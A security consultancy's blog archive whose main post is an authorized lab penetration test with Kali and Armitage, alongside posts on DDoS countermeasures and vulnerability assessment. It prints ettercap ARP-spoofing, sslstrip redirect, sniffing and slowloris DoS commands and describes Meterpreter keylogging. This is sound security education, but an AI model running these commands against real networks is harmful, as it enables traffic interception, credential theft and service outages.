Category Archives: Penetration testing

Too Silo’d to React, Now Respond.

Ever think what would happen if you ever got hacked? Maybe you are wondering if the IPS guys or the HIPS guys are really doing their jobs? In corporate America it is real easy to overlook a lot of precautions and security because you’re just too leveraged. Today’s threats are evolving as bad actors continue to find ways inside. They utilize social sites and technology, human frailty of being needed, and work their way through with some advanced IPS and IDS and Anit-X evasion techniques. So what are you to do?

Looking at the problem in your cube doing your work on your piece of the asset. Your mind tends to think “OK this is what I have to do and I move on to the next asset and service on that asset.” That is all you can touch. You’re ethical hacking group is looking too busy or not too busy to assist and maybe they can or cannot really find all the holes in your security posture. How about a resident hacker just for that client or span of control of clients that you have. Where one can check the security by reviewing the vulnerability report made with hacking tools. However, the key difference here is not to pay for a once a year penetration test but make it so that you test regularly. Red team vs. blue team and then provide results to management. Also, just testing monthly to make sure patches and firewall rules are in place would be great. I think this would be one of the best security practices a company could get into. RedSeal is a software solution that provides visibility into an organizations security by analysing configurations and building out the network diagram. It can then import vulnerability reports and host information to really give you the what if scenario that you have been thinking about in your cube. It will also give you your list of objectives to test and make sure you that the holes found are true and need to fix.

Security is not something you buy or do once in a while. It’s a practice built by defined policies and procedures that are completed over and over again. If you think you are failing to practice the right procedures every day or that your vigilance is intermittent, then I think you are a good candidate for some building security into everyday operations 101. Yes, a bit wordy there but think about it, its not rocket science the hurdle is time, the silo, and the recognized concept.

In conclusion, the best security is a resident security expert allowed to do their job by proving tools and processes. If you cannot get a resident hacker or spend time doing this allow me to make some suggestions. Get a requirement opened from HR to fill this role or hire a service from a firm that understands vulnerability assessments and penetration testing.  Allow them to practice regularly providing results to you and maybe you can stay out of the news. Security awareness and training also helps prevent attacks because users bring the risk in from their computers. The biggest tools to get in are Adobe Flash & Reader, Java, and spear phishing.

If you have any questions or comments or looking for advice on services and where to go, feel free to contact me

Penetration Testing with Linux – Featuring Kali and Armitage

Netwerk Guardian LLC is bringing this to you showing what can be done penetration testing with Kali or Backtrack and using Armitage. This is a technical subset of my thesis on Effective Penetration Testing. So without further delay…

Penetration testing with Linux is one of the best ways to perform tests. It is a
versatile tool. Linux comes in many flavors like Backtrack5 RC3 or now Kali. Linux allows for the customization of the software itself plus the tools that you use. Therefore, the customization and level of sophistication is limitless. This article will cover using Backtrack5 RC3 and Armitage for the test as it was executed during the pen test. This article may not cover all features of Armitage. However, in order to provide you a better understanding of Amritage, Kali will be used as well in different screenshots. Note that Armitage is no longer supported under Backtrack with the recent release of Kali in early 2013. We chose to use Kali in this article to show you something recent but the other versions of Linux are still very good tools to use in the field.

Backtrack comes loaded with metasploit and as you know in order to find and run an exploit you have to switch to the directory and run the commands specific to it. This is no longer the case with Kali and the FHS (Filesystem Hierarchy Standard) Kali has taken care of this to make all commands system wide accessible from the command line. Armitage provides a nice GUI interface to Metasploit. It also has a dashboard you can use for setting up the hosts or network you are going to target. You can import hosts from files associated with other network security assessment tools like Nessus, IP360, and Burp session xml. Armitage imports anything from a text or xml file. You can use some of the automation presented with Armitage. In addition, it is wise to use customized these scripts when delivering a penetration test. You never really know what the outcome may be unless you test in a lab first. The great thing about Armitage is that it has a database of known vulnerabilities and attacks in which you can draw from in your test. This helps save time and keep you focused but not all exploits work as targets can be hardened. Customizing scripts and Linux has long been the core of these releases. Armitage can be used as a standalone tool as well as network solution when working with other pen testers. There are a few reporting options that can be used with Backtrack or Kali to save your work and share results or progress. Armitage has its own place to store evidence in data format but not in a report format that would be all inclusive. This is what is called loot where the results go.

Launching Armitage comes from navigating to the Applications menu item and following the terms Kali Linux > Exploitation Tools > Network Exploitation > Armitage (Image 1). In this new installation of Kali, you will have to manually type the following commands in order to get Armitage to connect to the database. They are; service postgresql start and service metasploit start. Once these are entered, you can start Armitage successfully using the install default user name msf and password test.
Image 1

Next there are a series of prompts that you will be directed to for launching and customizing port usage. Once Armitage is open we can begin using it to scan for hosts or network subnets. Just launch nmap (Image 2) from within Armitage and choose to add a host or scan a network with several scripted choices. The rules are the same for using nmap in Armitage and by itself. There are aggressive scan and quieter scans. So choose wisely in order to remain quiet. The machines we want to target are and One is a server hosting the core business application and the other is a typical user workstation. See image 3 below from the previous run pen test Armitage on Backtrack5 RC3.

Image 2 (Launching nmap within Armitage)

The next step you want to use is the find vulnerabilities scan. This takes Armitage and scans the hosts out there and it comes up with a proposed list of attacks. Now not all and every attack is going to work. It will give a type of technology to exploit. This coupled with your experience and training can then discover that it may or may not be successful. This is where the pen tester needs to be on their best game to find an exploit in which to launch a payload. What is good about Armitage is that each exploit or payload you try opens a new tab. So you can see what works and doesn’t and where to go next.
Now that we have our hosts found, targeted, and with an attack list, we can proceed. Since the machines were Windows based, we quickly went to this exploit to see if there was a way to pwn the boxes. In Armitage you can assign accounts to each host that is used to login and run the payloads. We chose many exploits but found that only one really works and will be addressed later. Below in Image 3 you can see that when a system username and password are known and the Login > psexec is used, the lightning is seen all around it.

Image 3 (Note the lightning around Hosts = pwned)

In the pen test shown here the machines’ administrator accounts were known in a white box test to see if we can sniff traffic from the core business application. The objective is that we are going to imitate an insider threat or demonstrate beyond passing the hash for Windows users in the network.
The following shows what we want to test. This is taken from a lab setup a typical company using earth materials management system. The network is made of Microsoft Windows machines with Windows 7 for end users and Windows Server 2008 R2. The objective is to look for vulnerabilities on the host machines to see if we can capture data on the hosts going across the network to the server for corporate espionage.
1. Test Core Business Application
a. Test core business application against
i. Clear text traffic capturing
ii. Man in the middle (MITM)
iii. Spoofing
iv. Armitage w/Meterpreter
v. DoS Slowloris

Port Scanning Results and Issues
Scanning Windows machines

The first test was scanning of services and ports on Microsoft devices. The test discovered the default Windows system ports open for unsigned SMB, telnet, and high ports. This included the port scanning by Nessus as well as the Microsoft Baseline Analyzer. The results from Nessus showed that there existed an unsigned SMB/Samba port (445) as well as using the open clear text port channel (23). Nessus found only (1) medium and (1) low alert for the server Port (135) on the workstation was found open and that was used for remote procedure protocol. Port (139) was found open and used with SMB for file sharing with other devices beside Microsoft. Port (808) is the Streetsmarts Web based application running encrypted. Port (992) was found to be an SSL port with a certificate error. Additional ports were found open ranging from (49152-49157) and were due from a release from Microsoft in January 2008 to start the open port range at that (49152). Some P2P (peer-to-peer) file sharing has been known to run over these ports.
The possible attack that could have occurred but was not conducted in the test was escalation in privileges via SMB vulnerability and brute forcing usernames and passwords. The attacker also could have social engineered the information from an unsuspecting user. There is a probability that this could have happened.

Armitage has the option for you to ask it what vulnerabilities and attacks could be possible on the chosen target. Just go to the host and select it and then go to the menu Attacks > Find Attacks. It will return a list of possible attacks and say “Happy Hunting!” Therefore, that is exactly what happened.

The following tools were used to test a vulnerability of unencrypted communication on the LAN (Local Area Network) with ettercap always being used for the MITM. They are SSLstrip, Dsniff, Driftnet, Urlsnarf, and meterpreter.

Technical Overview – Sniffing MITM Attacks
Using Ettercap we copied traffic from the user and the gateway to our pent-testing laptop. We used Ettercap with the following in an attempt to see traffic, sslstrip, urlsnarf, dnsiff, and Driftnet with these commands entered. In Ettercap we scanned the subnet and added a target 1 = gateway and target 2 = the victim machine. Here we were able to get a copy of everything being sent by the user to the laptop (attacker) first before going to the real gateway. This is done with sslstrip, iptables, ettercap with MITM attack arp spoofing. It is very important that in a test where you are trying to conceal what you are doing from detection that you must ensure you laptop is able to handle the traffic. You must be ready to execute the sequence of commands in order to avoid seeing packets destined to the same IP address twice.

Each attack and tool used has its benefits and limitations. The idea was to see data going across for corporate espionage and send to a competitor for money. The tools researched and chosen for this pen test to see what would really come across the wire. The following is a brief overview of each tool.

SSLstrip – Is a tool that prohibits a connection from upgrading to an SSL session in an unnoticeable way. Also the history behind this is that one could forge a certificate as being signed and trusted in order to appear as an https session or that the session was legitimate with the intended server that actually ended up being the attacker (Wikipedia).

Dsniff – A tool used to sniff anything of interest like email or passwords. Arp spoof has to be running of course so that the traffic is routed through the attacker PC and back out to the real router and PC (Wikipedia).

Driftnet – This tool allows you to see what images are going across the user’s browser while surfing the web. In this test users were not on the internet but were using a browser to launch an application which we wanted to see.

Urlsnarf – A tool that places all visited url output to file for easy reviewing. Not a tool that provides much advantage in this pen test.

Meterpreter – This tool can be used to take advantage of many vulnerabilities in different platforms in order to gain root access or control of a PC.

Script Execution
In the following presentation of code we see that numerous attempts utilizing ettercap and arp spoofing was done to send traffic to the attacker. Each tool was run alongside ettercap to see what information would actually pass to the attacker. The most exciting tools were Driftnet and meterpreter because of what could be seen and the control.

ettercap –mitm ARP:REMOTE –text –quiet –write /root/sslstrip/ettercap.log –iface eth0
Also the GUI was used to pick target client Windows 7 machine and second target the application server

Execute the following commands
In the CLI we entered:
root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:/#cat /proc/sys/net/ipv4/ip_forward
root@bt:# sudo iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
Now verify it took the filter
root@bt:~# iptables -L -t nat
target prot opt source destination
REDIRECT tcp — anywhere anywhere tcp dpt:www redir ports 10000
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
target prot opt source destination
root@bt:# sudo python -l 1000 -f lock.ico

Results sslstrip: No data or text of any sort was visible, since all data was being passed through an encrypted channel.

Results with dsniff: Web addresses were visible, but no usernames or passwords. These results show that the application is very secure.

Results with driftnet: There were no pictures or images of the site going across. There were web addresses being listed.

Results with urlsnarf: The only thing that came through here was some local address space and some internet address space redacted for publication. Still there were no real gems of information for quick gains.

Technical Output
root@bt:~# urlsnarf -n -i eth0
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128] – – [15/Jan/2013:23:10:12 -0500] “GET HTTP/1.1” – – “-” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” – – [15/Jan/2013:23:10:13 -0500] “GET – – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” – – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” – – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” – – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” – – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)”

Executed commands (example):
root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:/#cat /proc/sys/net/ipv4/ip_forward 1

In another terminal, we used Driftnet
root@bt:/# driftnet -i eth0
root@bt:/# driftnet -i eth0 -v -s (in an attempt to gain audio being streamed)
We could then see what the user was looking at for images.

Results: Images from core business application were not being sent to our laptop despite driftnet running
root@bt:~# driftnet -i eth0 -v
driftnet: using temporary file directory /tmp/driftnet-AmaowM
driftnet: listening on eth0 in promiscuous mode
driftnet: using filter expression `tcp’
driftnet: started display child, pid 2562
driftnet: link-level header length is 14 bytes
.driftnet: new connection: ->
…driftnet: new connection: ->
…driftnet: new connection: ->
…driftnet: new connection: ->

Meterpreter – Meterpreter used in with Armitage a connection made it impossible to glean any data or provide a way to leak data out; Meterpreter was used in this test. Knowing the administrator password, the connection was possible. Even a regular user with a known password would be able to both pass the hash dump and crack passwords later in order to attempt to escalate privileges. Time being the factor is how successful the cracker would be by going slow and password cracking.

Results: We were able to log keystrokes and take screen shots of the user’s computer. This is one way data could be captured. In this test, we show that key logging and screen captures are possible; however, they are not very effective as shown below, Image 7. Anything that was operating on the application level of the OSI model remained visible and the tool worked. When things went encrypted at the network level it was impossible to see.

Image 4 – Armitage Text Output of Key logging


Image 5 – Email Credentials Entered

Image 6 Screenshot Before Launching Encrypted Application


Image 7 – After Launching Encrypted Application

We have seen before that the desktop can be captured with screen shots and information could be leaked this way. However, notice in the image below that the application icon is present as a big ‘S’ in the toolbar, and on the workstation it is in the foreground. However, the image reveals that it is not seen and therefore encrypted to the reverse tcp shell. That ‘S’ represents the business’s core business application. The launch html page is the only visible part of the application, which is done on port 80. This demonstrates that the application running on the computer was able to encrypt all activity for queries, results, and navigation.

DoS – Slowloris Python Script

Now we get to some fun. Besides trying to sniff traffic and look at client proprietary data, we can also try to make their systems unavailable to them for this test. Remember that an unavailable system is loss of income or a serious impact that can make generating income and staying operational difficult to do. The script that we will use is a python script called slowloris. This script can be found at There is a script for IPv6 as well. This script is unique in that it does not try to hammer the web server right away with a full load of requests but that it comes in waves. There is a setting in the script for the number of connections per second and the frequency of those connections. These two fields were used against the server. The server was a Windows Server 2008 R2 (fresh install and no updates).

In order to start the script after you have downloaded it to your pen test PC is by As with any test you start with what is supposed to work and then review the results and make changes. The changes we made were simple as each time slowloris runs it makes a whole bunch of half requests to the web server. The requests never get finished and the web server is just sitting there with a session consumed waiting for the user to resume communication. This weakness is known for some Apache servers but not on IIS 7.0. At the time of this test it was unknown but thought it would be fun to try. Also check to make sure that you have Perl installed perl –v as most Linux instances do.

We modified the script to change the number of connections and then we lowered the timeout period for waiting to start that new connection. As the script ran we would notice the CPU on the server would spike to 78% and then 100% and then go down again as the script had entered its wait interval. Then it would run again and we would see similar results on the CPU. Now as far as hacking goes if you do not get the results you want just keep trying. So we stopped the script and change the connection per second to the maximum it would take 10,000 per second and again tested. After the second run the Server 2008 R2 would just take a hit but continue to serve out the web page. Unfortunately for the pen tester there was no break in service. Fortunately, for the company running the software they stayed operational. As a side note for non-Linux tool we used the Low orbit Ion Cannon multiple times on the server in addition to slowloris and still the web site was up.

The following commands will result in the same activity as we tested earlier in 2013. ./ -dns -port 443 -timeout 30 -num 10000 –https

In conclusion, we see that Linux offers a wide variety of attack tools that can be run independently or a part of a package like Armitage, Kali, Ubuntu, and of course the metasploit framework. This gives penetration testers the tools they need to perform tests against vulnerabilities by testing the exploits with different payloads. Some Windows based tools that can be used have gained notoriety but still Linux is a preferred platform. What is great about Linux and the open source community is that there are a lot of people contributing to its success. That is something that will carry the distributions forward as time and technology change.

Hypothetical DDoS (Part 2 of 2)

Recently a DDoS attack was carried out on the University’s network preventing legitimate users from enrolling or managing classes. The forensic analysis was able to determine what service and agents were causing the attack with Wireshark sniffer. The results showed that there were a multitude of infected computers operating in a botnet to initiate this DDoS.

In order to safe guard against future attacks Netwerk Guardian LLC has outlined and provided detailed application of security measures. These security countermeasures will help secure devices and remove attack vectors leaving only zero day and human related risks. The first step is to secure the devices that operate and manage the network. This would be devices like routers and switches that provide network access from inside to outside the University. Steps taken here will be to eliminate half open TCP SYN connections where a device sends SYN or SYN ACK requests and then leaves the session open not responding to ACK sent by the target. Eventually the router or switch becomes overwhelmed and starts to fail or crash. Adjustments to avoid this can be made on routers and switches. Moving on to routing vulnerabilities in routers out of the box would be to turn off CDP enable globally and remove directed broadcasts. Furthermore, the source routing feature should also be turned off as this can be used by attackers to tell packets how to route by strict or loose source routing. Proxy arp and gratuitous arp should be disabled. Proxy arp is when a device answers a request on behalf of the sending device. Gratuitous arp is associated with answering responses to arp requests not initiated by the router. Some vendors that schools use is 3com or now HP since their devices are plug and play. However, the gratuitous arp settings in here have been turned on so that the switch knows when it drops from a layer three device to a layer two device.

The new generation of switches is now more than just layer two as they are referred to as layer three switches. This means they can switch and route like routers. There are many similar features that need to be turned off and disabled like in routers. Gratuitous arp is one of those features. Another procedure that would be good to practice is access control lists (ACLs) for interfaces and interface vlans. These ACLs can stop traffic before it gets to a destination. Advanced configurations on the enterprise class of switches is to use private vlans and community vlans as well as Vlan Access Control List (VACLs). Looking at these configuration items a network administrator could have blocked the DDoS attack by hiding the server in a private or community vlans. Private vlans can be broken down into primary and secondary vlans. According to Wikipedia the following is true; “Primary vlans usually communicate with only an upstream port for all their requests. This is good for the ISP internet drops to a house or if the university wanted to drop an uplink to a computer lab. All the routing and rules would take place upstream. Secondary vlans come in two types isolated and community. The hosts in isolated vlans are only allowed to communicate with primary vlan and not with each other and the devices in the community vlans are only allowed to communicate amongst themselves and the primary vlan and not any other vlan” (Wikipedia, 2012). Had the University applied this type of topology to their local area network (LAN), they would have avoided this with the addition of a virtual IP address appliance (VIP). Using private vlans along with a virtual IP address appliance would have provided the protection from a flood of packets. The switches would have only allowed certain traffic to come from inside and multiplexed over to the server from the VIP. Multiplexed means creating a connection from an IP address based off of ports only that meet the protocol type and sequence. This would show a demonstration of secondary isolated vlan communication to a device upstream in the primary vlan for the requests and then out to the LAN.

The close look at device configurations in the preceding section has covered a lot of detail of what comes out of the box and what must be configured to secure the device and the network. We are now going to step back and discover a defense in depth architecture. Defense in depth means more than to patch our devices, use strong passwords, and control who or what interfaces with the device but also to have a series of defense mechanisms. One would be the firewall that might be a router or come in line after the router. These devices are good at stopping DoS, and DDoS attacks. This is akin to a steel fire proof front door in other words doing the heavy work. Next thing to place on the network are two switches to redistribute the uplink connection to the core of the network but only after passing through an intrusion protection system (IPS). The IPS sits in line with traffic and passes it along to the network after it has reviewed what is coming in. Then the traffic can go to the core devices and allow the LAN traffic to interact with the outside world. Taking security a step further one can use and Intrusion Detection System (IDS) and this can scan traffic to determine if it is safe or not but it does not stop offending traffic. In most cases these devices are setup to pass traffic through but record what types of attacks are being demonstrated. IDS device can sit in DMZ zones in a honey pot network to attract and learn from attackers as well as sit in on a LAN. The next step is to bring all the data calculations and protective method together to an appliance like Cisco MARS that processes the events and makes correlations for useful information for Information Security Personnel. Then the security professional makes an informed decision on what should be done.

Security is not just a purchase but a plan and it must be built into a network and not attached to a network. Using application layer firewalls and deep packet inspection firewalls allows for more granular approach at security. Packets are just packet and if they are sequenced right they can get around security devices pretty easily. The network administrators have to start reviewing not only sequence but size of packet and in some cases what’s in the packet. Application layer gateways or proxy devices can do that. The University could have used a proxy server to broker the requests from authenticated users before allowing access to the server. This can provide accountability plus assurance that the traffic is legitimate.

In conclusion the best security is built into a network with monitoring occurring at all locations. The University needs to implement this topology so they can receive intelligent information that will allow them to act in a moment’s notice. A DDoS will be much harder to accomplish with this preceding infrastructure.

Hypothetical DDoS – (Part 1 of 2)

The Yourtown University campus had on site computer labs to offer the local attending students. The University offer many supporting services for their students as they progress towards their degree. During the 2011 spring enrollment the web based class registration system had suffered a DDoS attack. The University network team found that the attack originated from the inside. The following explains how the attack occurred and the countermeasures required to circumvent this in the future.

Early in spring 2011 enrollment for the new term, Yourtown University online class registration system was not available during business hours and often into the evening hours. The IT Dept. had investigated the first week and determined that the web server kept crashing. Every few hours they had to restart the web server to recover the web services for online registration. An investigation had begun to see if the IIS server was failing from a bug or a patch. In the next week to follow the web server started crashing more and more and the outages started to increase. The network administrators had been capturing traffic during the first occurrence and noticed that there was a sniffer on the network in promiscuous mode listening to all traffic. They not only noticed one sniffer but multiple sniffers in different Computer Lab networks across campus. A decision was finally reached that someone had placed software based sniffers on different lab computers and was using an email relay service to send captures to a cryptic labeled email address.

During the next phase of the investigation the network administrators had tracked down the computers with the sniffers and removed them from service for analysis. The forensics team had discovered that the computers had as netcat installation on each box in the default admin share that allowed remote control of that computer. The attacker had gained access to the administrator username and password. The netcat server acted as the terminal server allowing more scripts for DNS poisoning and programs to be dumped on the offending machines. They also found a stripped down packet capture program that captured traffic and emailed text files in increments of 1.5 megabytes. Once the attacker could load files on the computer he had sent bots out that would send smurf attacks with the return answer to the class registration server. Also they discovered remnants of the Low Orbit Ion Cannon used for stress testing network devices.

Yourtown University called on the help of their super star student Kevin Pescatello to assist in providing countermeasures to safe guard against this threat from occurring. Kevin’s experience with the Trustwave NAC device came to mind and suggested the purchase will return the investment in up time and reputation of the school. It will allow the students to sign and purchase and pay for classes more consistently. This device performs network admission control and can be used on both hardwire and wireless networks. The device capitalizes on some unique processes that are under patent. The setup is to place the device on one the core switches and have it managed by one port while monitoring all the vlans in another port. Preferably two ports for monitoring that also allows mirroring and being inline like an IPS (Intrusion Protection System). One of the key features of the device is its ability to counter network traffic with a man in the middle attack (Trustwave, 2012). When a user joins the network they have to sign in and get scanned for compliance for antivirus and that updates are turned on. Once they meet those requirements and they can successfully log on. This allows the policing of the internal networks and reduces internal threats. The network administrator can customize the logged in profile to monitor each machine for more than twenty connections and for the number of devices they are scanning to be no more than ten. When these thresholds are met and exceeded the network admission control device steps in and moves the user to the underverse. In the underverse there is no Ethernet or internet. The violating user remains isolated for a period before being allowed to authenticate and play nicely. Notably, there is a feature called deception. Once deception is turned on the end user that scans addresses has his requests intercepted by Trustwave NAC and there is no response. The attacker’s goal is thwarted.

Yourtown University has contracted out with Netwerk Guardian LLC to install and train the network staff how to use such a device. This cost will be budgeted for in the next fiscal year. The return on investment as stated prior is continued uptime for network resources, reputation, and the lower administrative cost for IT and bursar’s office. This device will authenticate each student and make known who is coming from where. There are many features that are rather technical that describe what attack vectors can be thwarted. Among include DDoS, smurf attacks, IP spoofing, man in the middle, port scanning, and sniffing. Most of the aforementioned attack vectors or a variant was used in this incident.

Vulnerability Assessment – Should it be Done in House?

When it comes to a security assessment of your businesses IT assets and infrastructure, who does it? You or the other guy?

Outsourcing Vulnerability Assessment

Outsourcing Vulnerability Assessment

Difference between Vulnerability Assessment and a Pentest?
The difference between the vulnerability assessment and a pentest is that a vulnerability assessment just finds the holes and does not exploit them. In the penetration test, security professionals think like hackers and try ways to use vulnerabilities to get inside the network. When conducting the vulnerability assessment you want to pay attention to scanning the assets with the right software and try to find the vulnerabilities that the hackers will find. The penetration test is where the vulnerability is exploited and a server is owned or a network is compromised with data flowing out to a hacker. In either scenario, the company must define its assets so that they know what they are going to test and assign ownership. While trying to test for weaknesses you might as well prepare for ISO 27001/2 audit.

A good example would be to take GFI LAN Scanner and scan a network with current definitions of known vulnerabilities loaded. The results should show that there are systems that need to be patched. The same goes with Microsoft Baseline Security Analyzer. This will find the difference in levels of a Windows operating system of where it is and what level it needs to be for patching. Taking a closer look at penetration testing would be for a hacker to play the bad person and enumerate the network from logged in credentials. Then using meterpreter packaged in a game, the unsuspecting user downloaded. Now the attacker can escalate to a system account privilege to change the user account to an admin account on the box. This type of test is the essence of a penetration test where the hackers has inserted themselves and are gaining a foothold and escalating privileges to do more harm.
Vulnerability Assessment
In order to conduct a vulnerability assessment correctly you have to define your assets and organize them. Know what you have and know what you want to test. This could mean assigning ownership of the asset being defined, and analyzed. Next you should get a few tools to help with the assessment. Pick up a tool or two that measures risks on software like operating systems and one that does networks. Next before doing any work on the infrastructure put in place a communication tree between the CIO and the outsourced vendor. This way if something does impact production network someone can stop it or inform the staff that it is expected today if need be. Later, after the outsourced vulnerability assessment is conducted the company IT department may want to have some policy and procedures out lining a scheduled assessment.

The next thing you want to do is calculate the risk. Most often it is the quantitative assessment then qualitative. However, here are the two assessments presented by the two formulas; Calculate Risk = Vulnerability X Attacks X Threat X Exposure (Snedaker, 2007). This will definitely get you a dollar amount but there is some subjective evaluation of the attack and exposure. Again, this qualitative weight in the quantitative formula is like a hybrid. Unless you are benchmarking from proven studies to extrapolate your numbers, it will have some subjective input. The latter formula could be more qualitative, as the reference to the frequency will be subjective in the first year run. The next subsequent years can more easily defined as quantitative. A historic record will assist you in the following years.

When the company gets to writing a policy for their own quarterly scanning and assessment, they should have it written as a policy. The policy will state when and by who the vulnerability assessment should be done. There will be an accompanying procedure outlining the exact steps to take that have been proven and approved. This will aid them in becoming closer to an ISO 27001/2 compliance as well as safeguard their assets.

Decision Point over Dilemma
The company has a dilemma either to proceed with their own assessment or hire out to third party. Realistically you should stick to what you are good at. This means if your IT department has the history of performing such analysis then proceed. However, this small company doesn’t have the manpower. Knowledge of is not the same as working knowledge. What is important to the company IT department in the assessment. Is it the scan type, assets, demonstrated effective use of vulnerability assessment, and industry experience. Industry experience is going to account for a lot of what the company IT department is lacking in this disciplined practice. You need to have focus and experience to know what is going to work and what will not. The company IT department does not have the luxury of time for honing their skills. Another inherent risk is complacency of the environment. This doesn’t mean the IT department is tired of the place it works in it just means that not all assets are going to come to mind when some devices or do not get used all the time.

What are we looking for in the assessment? In a normal vulnerability assessment the professional team will look for systems, server, and networks that have not patched to a protected level or hardened systems. Hardened systems are systems that are running with only the services they really need to run and have some protection whether a trusted computer system or firewall. Systems that are patched to the right level and have no known vulnerabilities are the goal of any assessment. Getting to that secured level and preserving it through continuous monitoring. The company IT department may not have such knowledge and therefore not the best selection for running the assessment.

Company Action Items
The IT Security Professional is designated technical lead for the assessment. The action items are to find and catalog all assets both hardware and software for the assessment. What the technical lead will do is group together all network subnets unto themselves if more than one. They will also find the different types of operating systems and group those together. The next step is to find the different software that is used as a service with in the company for the assessment. This means servers that share out software and services all must be identified and listed for versions and type. An example would be a list of all database servers. Out of the database servers you will list the ones using MS SQL, Oracle, and which use a web front end with html. In addition, the technical lead will find the database servers whose front end is driven by SOAP, or AJAX and any other like java. This list will be exhaustive but it will declare the assets and the exposure type they possess. Also this will be used for the outsourced company performing the scan.

Risk from Internal Vulnerability Assessment
The risk you have to conducting an assessment on your own is knowing enough to be dangerous but not enough to be effective. The expertise of security consultants is then drawn upon to do the assessment. While performing your assessment you may omit to test certain other parts of the network or devices you don’t use or manage. You might even fail to test a security objective that is a major flaw from a vendor or technology implemented. This would require special attention because some businesses have contracts with other companies based on an ISO rating. This means that the company either knows how to produce consistent results or hires a company to assist in providing the infrastructure for consistent results. A consultant would either find the requirements for the vulnerability assessment. This is very important to make the assessment a valid one.

Teaming up with 3rd Party Security Experts
The company has realized that while their Information Security professional is quite well versed in their profession that they will be seeking outside vendor to assist in the vulnerability assessment. The first thing the company needs to do is get legal advice from an attorney that has knowledge of technological testing where intellectual property, assets, and risks operate in the same arena. The lawyer has to be knowledgeable about USC 18 Section 1029 & 1030, PCI, Sarbanes Oxley, as well as other laws about privacy and disclosure. The company will coordinate with the lawyer to make sure that the vendor they choose to go with operates under an agreement.

Now the company has to find a reputable company to perform this assessment. This agreement will be the legal document that authorizes and binds the two parties to operate professionally with the client’s interest as a focal point. The company providing the service will provide names of the team members that will be coming onsite or offsite to perform the test. They will have to comply with company policy that the participants all have to be US citizens and have a clean criminal record or one that has been made right provided by documented testimony of character and a signature of said individual recommending them for this service.

The two companies design an agreement/contract that details what is and what is not to be scanned as stated in slides 6 and 9. The agreement also has to include that there is liability coverage and the 3rd party has errors and omissions insurance. The contract will further read that if anything happens outside the scope of the test both parties will attempt at mutually agreeing to a course of action verbally to rectify the situation. No fault clauses can be agreed upon but rarely is that allowed and is contrary to getting legal direction. Later, the course of action taken will be written as an addendum to the agreement and signed by the officer of each company legally able to form agreements. Once this document is done and the vulnerability assessing company has written consent to perform the test, then they can begin on the agreed upon date.

In the agreement the technical lead (Information Security Professional Employee) will have the entire topology mapped and each test area scheduled for testing. All the details about what is to be tested can also be outlined in here. This is where the Information Security Professional can make known what devices or types of scans are allowed and not allowed. Most scans are noninvasive or unable to interrupt production. It is an approach that is over the top but when you are talking about intellectual property, data privacy of people, and the general operating capacity of a business, there are no short cuts. The agreement has to state what will be tested, how, when, and the objective. There will be a schedule to follow and a communication tree to call if things go out of focus or assets are becoming unusable.
Vulnerability Assessment
After the vulnerability assessment has been conducted a report of such results should be created. The results could be matches to the ones found on the publically known Mitre CVE list. Also, the company can proactively start looking ahead at the CVE site for more vulnerabilities in software that they currently use. When the third party vendor finds these vulnerabilities they are held to the contract for not disclosing their findings. In the process of doing the assessment they found ways into the citizen personal records database allowing them to have free range of the data therein. Again, the agreement states that no matter what they find in the course of the assessment they are not allowed to disseminate the information.

The vendor now has an accumulation of vulnerabilities and configuration settings and dependencies that need to be reported and presented for review. The report can be created by any software that they have chosen going into the assessment but the report must be hand delivered and not emailed. The report needs to make it to the desk of the Information Security Professional, CISO, and the CEO’s office. What happens after that is all the responsibility of the company. The reports should be reviewed with the company who provided the assessment to show what vulnerabilities were discovered and with what tools. They will show what needs to be done to correct this and then empower the company through council or outsourcing their assessments to create a schedule.

Report Details
Once the assessment is done the team has a report they give to the company. In it this report it will include all the assets as they were before the scan. This include the configurations and patch levels provided by the Information Security Professional and verified by the assessment team. The assessment team had given some indication of how the assessment was going to be conducted in the agreement but not at the detail provided in the report. In the report that follows the team tells how each group and in some case individual items were scanned. The results of the scans now need to be addressed. The assessment team provides a link to vendor specific pages for the upkeep of the software and it includes releases addressing security concerns. Also, the team provides an independent vulnerability site that provides a list of outstanding and recorded vulnerabilities for many vendors and advises the Information Security Professional to sign up for updates on the items they host.

The assessment team then provides steps for remediation that they can provide. These will include testing before patching by imaging the company servers and emulating their network architecture. This is an additional service the assessment team can provide for a price or the company can manage their own.

Routine Assessments
The schedule will be a routine check of the systems both hardware and software to see if there are any vulnerabilities not discovered and the ones that are patched are taken affect at protecting the asset. The Information Security Professional will then create a policy under the guidance of senior management and the CEO, that provides details of what actions have to take place in a quarterly scanning of the devices.

The scans should occur quarterly and at the last two weeks of the first month in the new quarter. This way any new vulnerabilities and published exploits get published. This give the company’s IT group time to test patches and deploy. The assessment gets processed the same every month as the initial assessment with reports being created in the third week. Executive reports get delivered to the CISO and CEO by 2nd week of the 2nd month for review.

The executive review can consist of the employees of the company or here the Information Security Professional reviewing the reports are on target for an ISO certification and accreditation. Any notes provided by the assessment team can be interpreted as a strategic vision for the IT department in the up and coming years.